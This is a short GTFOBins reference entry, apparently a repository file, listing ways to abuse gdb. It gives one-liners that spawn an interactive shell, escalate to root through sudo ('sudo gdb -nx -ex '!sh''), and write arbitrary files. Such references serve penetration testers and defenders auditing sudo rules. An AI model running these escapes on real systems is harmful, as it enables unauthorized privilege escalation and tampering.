GTFOBins.github.io/_gtfobins/gdb.md
2018-05-28 21:55:44 +02:00

522 B

description functions
GDB may come with embedded Python support, in that case arbitrary code can be executed with the `python` command in the context of the GDB process. See the entries of Python version [2](/gtfobins/python2/) and version [3](/gtfobins/python3/).
execute-interactive sudo-enabled file-write
code
gdb -nx -ex '!sh' -ex quit
code
sudo gdb -nx -ex '!sh' -ex quit
code
LFILE=file_to_write gdb -nx -ex "dump value $LFILE "data"" -ex quit